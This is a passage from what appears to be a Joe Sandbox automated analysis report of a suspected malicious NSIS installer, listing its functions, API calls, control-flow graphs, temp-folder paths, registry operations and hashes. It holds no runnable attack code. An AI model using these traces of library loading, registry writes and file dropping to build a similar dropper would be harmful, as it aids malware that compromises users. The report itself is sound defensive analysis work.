                          • Associated: 00000000.00000002.16255452100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_vfhlZ0vrbe.jbxd
                          Similarity
                          • API ID: DirectoryLibraryLoadSystemwsprintf
                          • String ID: %s%s.dll$UXTHEME$\
                          • API String ID: 2200240437-4240819195
                          • Opcode ID: bb0c7447bffed25a47ff2517fd87417c43c35d72d0d658bdc18f354cf5cb2530
                          • Instruction ID: e759eb08ac56218b9122c2e4f19d02add1096545fd4a6e696b7e3c492baae584
                          • Opcode Fuzzy Hash: bb0c7447bffed25a47ff2517fd87417c43c35d72d0d658bdc18f354cf5cb2530
                          • Instruction Fuzzy Hash: 74F0FC305002096BDF149B74DD0DFEB365CAF08704F14097AA586E10D1E9B9D4758B69
                          Function 004020CA Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73libraryloaderCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 734 4020ca-4020d6 735 402191-402193 734->735 736 4020dc-4020f2 call 402c5e * 2 734->736 738 40230a-40230f call 401423 735->738 745 402101-40210f LoadLibraryExA 736->745 746 4020f4-4020ff GetModuleHandleA 736->746 744 402aea-402af9 738->744 748 402111-40211e GetProcAddress 745->748 749 40218a-40218c 745->749 746->745 746->748 751 402120-402126 748->751 752 40215d-402162 call 4053d1 748->752 749->738 754 402128-402134 call 401423 751->754 755 40213f-40215b 751->755 756 402167-40216a 752->756 754->756 765 402136-40213d 754->765 755->756 756->744 759 402170-402178 call 403a36 756->759 759->744 764 40217e-402185 FreeLibrary 759->764 764->744 765->756
                          APIs
                          • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 004020F5
                            • Part of subcall function 004053D1: lstrlenA.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsw42F9.tmp\,00000000,00422E40,771923A0,?,?,?,?,?,?,?,?,?,004032C3,00000000,?), ref: 0040540A
                            • Part of subcall function 004053D1: lstrlenA.KERNEL32(004032C3,Remove folder: C:\Users\user\AppData\Local\Temp\nsw42F9.tmp\,00000000,00422E40,771923A0,?,?,?,?,?,?,?,?,?,004032C3,00000000), ref: 0040541A
                            • Part of subcall function 004053D1: lstrcatA.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsw42F9.tmp\,004032C3,004032C3,Remove folder: C:\Users\user\AppData\Local\Temp\nsw42F9.tmp\,00000000,00422E40,771923A0), ref: 0040542D
                            • Part of subcall function 004053D1: SetWindowTextA.USER32(Remove folder: C:\Users\user\AppData\Local\Temp\nsw42F9.tmp\,Remove folder: C:\Users\user\AppData\Local\Temp\nsw42F9.tmp\), ref: 0040543F
                            • Part of subcall function 004053D1: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405465
                            • Part of subcall function 004053D1: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040547F
                            • Part of subcall function 004053D1: SendMessageA.USER32(?,00001013,?,00000000), ref: 0040548D
                          • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00402105
                          • GetProcAddress.KERNEL32(00000000,?), ref: 00402115
                          • FreeLibrary.KERNELBASE(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 0040217F
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.16255137450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.16255083471.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255190632.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255452100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_vfhlZ0vrbe.jbxd
                          Similarity
                          • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                          • String ID: Bry gek$
                          • API String ID: 2987980305-3395696698
                          • Opcode ID: 056f6e09274932c5806e516a526782628814fdef0fe3ef9b51a109e535a48abd
                          • Instruction ID: 18bbb9f6491bb16bc869df63e9f5beea4603ad23440c914569cabcc4b16c920a
                          • Opcode Fuzzy Hash: 056f6e09274932c5806e516a526782628814fdef0fe3ef9b51a109e535a48abd
                          • Instruction Fuzzy Hash: ED21C931A00115BBCF20BF659F89B6F7570AB40358F20413BF611B61D1CABD49839A5E
                          Function 00401C53 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 766 401c53-401c73 call 402c3c * 2 771 401c75-401c7c call 402c5e 766->771 772 401c7f-401c83 766->772 771->772 774 401c85-401c8c call 402c5e 772->774 775 401c8f-401c95 772->775 774->775 778 401ce3-401d09 call 402c5e * 2 FindWindowExA 775->778 779 401c97-401cb3 call 402c3c * 2 775->779 791 401d0f 778->791 789 401cd3-401ce1 SendMessageA 779->789 790 401cb5-401cd1 SendMessageTimeoutA 779->790 789->791 792 401d12-401d15 790->792 791->792 793 402aea-402af9 792->793 794 401d1b 792->794 794->793
                          APIs
                          • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CC3
                          • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401CDB
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.16255137450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.16255083471.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255190632.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255452100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_vfhlZ0vrbe.jbxd
                          Similarity
                          • API ID: MessageSend$Timeout
                          • String ID: !
                          • API String ID: 1777923405-2657877971
                          • Opcode ID: 6b7a83c98c9a4dd998c630d8be00bc685075749139b64b10b53530248dbe3f14
                          • Instruction ID: 290ea32ff0ec2f544a370e30947e4a0d8eefe4f8a949274a77cee2e27ce3354c
                          • Opcode Fuzzy Hash: 6b7a83c98c9a4dd998c630d8be00bc685075749139b64b10b53530248dbe3f14
                          • Instruction Fuzzy Hash: E121B471948209BFEF05AFA4DA86AAE7FB1EF44304F20447EF105B61D1C6B98681DB18
                          Function 004024A5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64registrystringCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 797 4024a5-4024ca call 402c5e * 2 call 402cee 803 4024cf-4024d4 797->803 804 402aea-402af9 803->804 805 4024da-4024e4 803->805 807 4024f4-4024f7 805->807 808 4024e6-4024f3 call 402c5e lstrlenA 805->808 810 4024f9-40250d call 402c3c 807->810 811 40250e-402511 807->811 808->807 810->811 815 402522-402536 RegSetValueExA 811->815 816 402513-40251d call 403168 811->816 819 402538 815->819 820 40253b-402618 RegCloseKey 815->820 816->815 819->820 820->804
                          APIs
                          • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsw42F9.tmp,00000023,00000011,00000002), ref: 004024EE
                          • RegSetValueExA.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsw42F9.tmp,00000000,00000011,00000002), ref: 0040252E
                          • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsw42F9.tmp,00000000,00000011,00000002), ref: 00402612
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.16255137450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.16255083471.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255190632.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255452100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_vfhlZ0vrbe.jbxd
                          Similarity
                          • API ID: CloseValuelstrlen
                          • String ID: C:\Users\user\AppData\Local\Temp\nsw42F9.tmp
                          • API String ID: 2655323295-2773041337
                          • Opcode ID: 994313b24f6ecc10b85d58a81230281b56cede14dcfa62075e128b500db5823b
                          • Instruction ID: 6d397742f2669f62c509e0fee011734c1b12f88961c408bb43c0d560fe134550
                          • Opcode Fuzzy Hash: 994313b24f6ecc10b85d58a81230281b56cede14dcfa62075e128b500db5823b
                          • Instruction Fuzzy Hash: DA119371A04118BFEF10AFB59E49AAE7A74EB54314F20443FF505F61D1C6B98D829A18
                          Function 00405D0D Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46stringCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 822 405d0d-405d28 call 40628d call 405cb8 827 405d2a-405d2c 822->827 828 405d2e-405d3b call 406587 822->828 829 405d80-405d82 827->829 832 405d47-405d49 828->832 833 405d3d-405d41 828->833 835 405d5f-405d68 lstrlenA 832->835 833->827 834 405d43-405d45 833->834 834->827 834->832 836 405d6a-405d7e call 405c1f GetFileAttributesA 835->836 837 405d4b-405d52 call 406620 835->837 836->829 842 405d54-405d57 837->842 843 405d59-405d5a call 405c66 837->843 842->827 842->843 843->835
                          APIs
                            • Part of subcall function 0040628D: lstrcpynA.KERNEL32(0000000C,0000000C,00000400,0040357B,Swindlery Setup,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040629A
                            • Part of subcall function 00405CB8: CharNextA.USER32(?,?,C:\,0000000C,00405D24,C:\,C:\,77193410,?,C:\Users\user\AppData\Local\Temp\,00405A6F,?,77193410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\vfhlZ0vrbe.exe"), ref: 00405CC6
                            • Part of subcall function 00405CB8: CharNextA.USER32(00000000), ref: 00405CCB
                            • Part of subcall function 00405CB8: CharNextA.USER32(00000000), ref: 00405CDF
                          • lstrlenA.KERNEL32(C:\,00000000,C:\,C:\,77193410,?,C:\Users\user\AppData\Local\Temp\,00405A6F,?,77193410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\vfhlZ0vrbe.exe"), ref: 00405D60
                          • GetFileAttributesA.KERNELBASE(C:\,C:\,C:\,C:\,C:\,C:\,00000000,C:\,C:\,77193410,?,C:\Users\user\AppData\Local\Temp\,00405A6F,?,77193410,C:\Users\user\AppData\Local\Temp\), ref: 00405D70
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.16255137450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.16255083471.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255190632.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255452100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_vfhlZ0vrbe.jbxd
                          Similarity
                          • API ID: CharNext$AttributesFilelstrcpynlstrlen
                          • String ID: C:\$C:\Users\user\AppData\Local\Temp\
                          • API String ID: 3248276644-2214159804
                          • Opcode ID: 308fadea3a0b968ed56b92214e6bc0f27c5543f8f515069d12591bb602a569a4
                          • Instruction ID: 935e679f1c1c714b0e3911a5d698b339edd04cd04073ee9c7d5fe0644536c501
                          • Opcode Fuzzy Hash: 308fadea3a0b968ed56b92214e6bc0f27c5543f8f515069d12591bb602a569a4
                          • Instruction Fuzzy Hash: FCF02831105E511AE62233352C0DAAF1A44CE93364719857FF855B12D2DB3C89479D7D
                          Function 00405E4F Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 33COMMON
                          Download Yara Rule
                          APIs
                          • GetTickCount.KERNEL32 ref: 00405E63
                          • GetTempFileNameA.KERNELBASE(0000000C,?,00000000,?,?,004033D6,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036B5,?,00000008), ref: 00405E7D
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.16255137450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.16255083471.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255190632.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255452100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_vfhlZ0vrbe.jbxd
                          Similarity
                          • API ID: CountFileNameTempTick
                          • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                          • API String ID: 1716503409-944333549
                          • Opcode ID: 785ee4e59b25deabe338fa9c65985dff7b7c4930a860df7800de2eab11a71ed7
                          • Instruction ID: 3970c65dfeb72379d163dc795dbdbe3f0392b49dfad0d6f3c406a96719355742
                          • Opcode Fuzzy Hash: 785ee4e59b25deabe338fa9c65985dff7b7c4930a860df7800de2eab11a71ed7
                          • Instruction Fuzzy Hash: A0F082363042046BDB109F56EC04B9B7B9CEF91750F10803BF9889B180D6B099558798
                          Function 004015E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00405CB8: CharNextA.USER32(?,?,C:\,0000000C,00405D24,C:\,C:\,77193410,?,C:\Users\user\AppData\Local\Temp\,00405A6F,?,77193410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\vfhlZ0vrbe.exe"), ref: 00405CC6
                            • Part of subcall function 00405CB8: CharNextA.USER32(00000000), ref: 00405CCB
                            • Part of subcall function 00405CB8: CharNextA.USER32(00000000), ref: 00405CDF
                          • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 00401632
                            • Part of subcall function 00405897: CreateDirectoryA.KERNELBASE(?,?), ref: 004058D9
                          • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp\Gutturotetany\dearth\Reunified\Betrkkene,00000000,00000000,000000F0), ref: 00401661
                          Strings
                          • C:\Users\user\AppData\Local\Temp\Gutturotetany\dearth\Reunified\Betrkkene, xrefs: 00401656
                          Memory Dump Source
                          • Source File: 00000000.00000002.16255137450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.16255083471.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255190632.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255452100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_vfhlZ0vrbe.jbxd
                          Similarity
                          • API ID: CharNext$Directory$AttributesCreateCurrentFile
                          • String ID: C:\Users\user\AppData\Local\Temp\Gutturotetany\dearth\Reunified\Betrkkene
                          • API String ID: 1892508949-929867550
                          • Opcode ID: 2c20d4c644fd78e3d1f4ce17685fc2594679ef97166e32e1fcd970dca5652f26
                          • Instruction ID: 0b6d2b43488905cbaa276f6c0cac56371e043703d2fe031d841b632f48d4a949
                          • Opcode Fuzzy Hash: 2c20d4c644fd78e3d1f4ce17685fc2594679ef97166e32e1fcd970dca5652f26
                          • Instruction Fuzzy Hash: 3911E331904240AFDF307F754D41A7F26B0DA56724B68497FF891B22E2C63D49439A6E
                          Function 00406174 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON
                          Download Yara Rule
                          APIs
                          • RegQueryValueExA.KERNELBASE(?,?,00000000,?,?,00000400,Remove folder: ,?,?,?,?,00000000,?,?,00406432,80000002), ref: 004061BA
                          • RegCloseKey.KERNELBASE(?,?,00406432,80000002,Software\Microsoft\Windows\CurrentVersion,?,Remove folder: ,?,?,Remove folder: C:\Users\user\AppData\Local\Temp\nsw42F9.tmp\), ref: 004061C5
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.16255137450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.16255083471.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255190632.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255452100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_vfhlZ0vrbe.jbxd
                          Similarity
                          • API ID: CloseQueryValue
                          • String ID: Remove folder:
                          • API String ID: 3356406503-1958208860
                          • Opcode ID: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
                          • Instruction ID: 11b83480b68dea0a629fd90b3ddfe96452127a043c469d5d543a73811e09722f
                          • Opcode Fuzzy Hash: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
                          • Instruction Fuzzy Hash: 9A01D472500209ABCF22CF10CD05FDB3FA8EF54354F01403AF915A6191D774CA64CB94
                          Function 004025B5 Relevance: 4.5, APIs: 3, Instructions: 47registryCOMMON
                          Download Yara Rule
                          APIs
                          • RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025E7
                          • RegEnumValueA.ADVAPI32(00000000,00000000,?,?), ref: 004025FA
                          • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsw42F9.tmp,00000000,00000011,00000002), ref: 00402612
                          Memory Dump Source
                          • Source File: 00000000.00000002.16255137450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.16255083471.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255190632.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255452100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_vfhlZ0vrbe.jbxd
                          Similarity
                          • API ID: Enum$CloseValue
                          • String ID:
                          • API String ID: 397863658-0
                          • Opcode ID: 4c7cffd82a1a6ff72a98075f8b8725b621981bbded826c54beb525449930f380
                          • Instruction ID: cba12c4e2b45f70554d055d57f05f50eb42167a32c5ceb359e12f1818167ad50
                          • Opcode Fuzzy Hash: 4c7cffd82a1a6ff72a98075f8b8725b621981bbded826c54beb525449930f380
                          • Instruction Fuzzy Hash: 4E01BC71604204AFEB218F54DE98ABF7AACEB40348F10443FF005A61C0DAB84A459A29
                          Function 00405A07 Relevance: 4.5, APIs: 3, Instructions: 28fileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00405DFB: GetFileAttributesA.KERNELBASE(?,?,00405A13,?,?,00000000,00405BF6,?,?,?,?), ref: 00405E00
                            • Part of subcall function 00405DFB: SetFileAttributesA.KERNELBASE(?,00000000), ref: 00405E14
                          • RemoveDirectoryA.KERNELBASE(?,?,?,00000000,00405BF6), ref: 00405A22
                          • DeleteFileA.KERNELBASE(?,?,?,00000000,00405BF6), ref: 00405A2A
                          • SetFileAttributesA.KERNEL32(?,00000000), ref: 00405A42
                          Memory Dump Source
                          • Source File: 00000000.00000002.16255137450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.16255083471.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255190632.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255452100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_vfhlZ0vrbe.jbxd
                          Similarity
                          • API ID: File$Attributes$DeleteDirectoryRemove
                          • String ID:
                          • API String ID: 1655745494-0
                          • Opcode ID: 043921b8c917d9d62ea668da32ed729a983a4b9cb196bdfb72cf9d57704c1844
                          • Instruction ID: 6cbbeebccd270b92d1032a3138f2130d4a861fe222b861409a1048e863718438
                          • Opcode Fuzzy Hash: 043921b8c917d9d62ea668da32ed729a983a4b9cb196bdfb72cf9d57704c1844
                          • Instruction Fuzzy Hash: 7FE0E531314A915BC3105774AA8CA5B2A98DFC2315F050A3AF4A2B10C0CB78444A8F6D
                          Function 00402543 Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON
                          Download Yara Rule
                          APIs
                          • RegQueryValueExA.ADVAPI32(00000000,00000000,?,?,?,?), ref: 00402573
                          • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsw42F9.tmp,00000000,00000011,00000002), ref: 00402612
                          Memory Dump Source
                          • Source File: 00000000.00000002.16255137450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.16255083471.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255190632.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255452100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_vfhlZ0vrbe.jbxd
                          Similarity
                          • API ID: CloseQueryValue
                          • String ID:
                          • API String ID: 3356406503-0
                          • Opcode ID: dcdcdbe78ff3a909b69e1bc964059ef71c3d22f6032091b40b69186da43a403e
                          • Instruction ID: 97fa2cc47e124225833d1b044c3f4c0ff185fe65e0aec06a9837656ed07e9740
                          • Opcode Fuzzy Hash: dcdcdbe78ff3a909b69e1bc964059ef71c3d22f6032091b40b69186da43a403e
                          • Instruction Fuzzy Hash: 6511C171905205EFDF20CF60CA985AE7AB4EF01344F20883FE446B72C0D6B88A45DA1A
                          Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                          Download Yara Rule
                          APIs
                          • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                          • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                          Memory Dump Source
                          • Source File: 00000000.00000002.16255137450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.16255083471.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255190632.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255247283.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.16255452100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_vfhlZ0vrbe.jbxd
                          Similarity
                          • API ID: MessageSend
                          • String ID:
                          • API String ID: 3850602802-0
                          • Opcode ID: a4ad1f289275d07b12332ff40cf82794c587183748ad10ec12a076e6d131a720
                          • Instruction ID: 80ce8cba2e1b90c3c9584b4bf9ae45de9eb83361fcac52349235150bfd3c5ac5
                          • Opcode Fuzzy Hash: a4ad1f289275d07b12332ff40cf82794c587183748ad10ec12a076e6d131a720
                          • Instruction Fuzzy Hash: C801F4317242209BE7295B399D08B6A36D8E710754F50823FF995F71F1E678CC028B5C
                          Function 00405897 Relevance: 3.0, APIs: 2, Instructions: 26COMMON
